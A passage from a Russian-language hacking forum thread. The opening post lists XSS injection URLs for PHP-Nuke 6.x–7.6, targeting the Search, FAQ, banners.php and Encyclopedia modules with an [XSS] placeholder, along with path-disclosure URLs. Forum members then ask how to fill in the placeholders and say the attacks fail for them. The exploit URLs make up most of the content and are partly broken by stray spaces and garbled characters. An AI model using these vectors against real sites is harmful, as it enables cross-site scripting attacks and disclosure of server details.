![]() |
PHP-Nuke 6.x, 7-7.6
http://[target]/[nuke_dir]/modules.php?
name=Search&author=[author]&topic= 0&min=999999999[XSS]&query=[our query] http://[target]/[nuke_dir]/modules.php? name=Search&author=[author]&topic= 0&min=999999999[XSS]&query= [our_query]&type=users&category=2 http://[target]/[nuke_dir]/modules.php? name=Search&author=[author]&topic= 0&min=999999999[XSS]&query= [our_query]&type=comments&categ ory=2 http://[target]/[nuke_dir]/modules.php? name=Search&author=[author]&topic= 0&min=999999999[XSS]&query= [our_query]&type=stories&category=2 http://[target]/[nuke_dir] /modules.php? name=Search&author=[author]&topic= 0&min=999999999[XSS]&query= [our_query]&type=reviews&category=2 http://[target]/[nuke_dir]/modules.php? name=FAQ&myfaq=yes&i d_cat=1& categories=45435[XSS] http://[target]/[nuke_dir]/banners.php? op=EmailStats&login=[our_login]&cid=1&bid=[XSS] http://[target]/[nuke_dir]/modules.php?name= Encyclopedia&file=index&op=terms&eid=1<r=[XSS] Удаленный пользователь может напрямую запросить некоторые сценарии и получить данные об установочной директории приложения. Примеры: http://[target]/[nuke_dir]/modules.php?name=Your_Account&op=userinfo http://[target]/[nuke_dir]/modules.php?name=Your_Account&op=my_headlines http://[target]/[nuke_dir]/modules.php?name=Encyclopedia&file=index&op=search |
Неплохо...
|
Половину Sql я видел на секлабе
|
только серьёзного нечего несделать.
|
А чё такое [our query] ::??
|
Цитата:
|
чё-то у меня не катит или я чего-то недопонимаю???
|
А что нужно туда писать то?? это вопрос к m0nzt3r
|
| Время: 13:30 |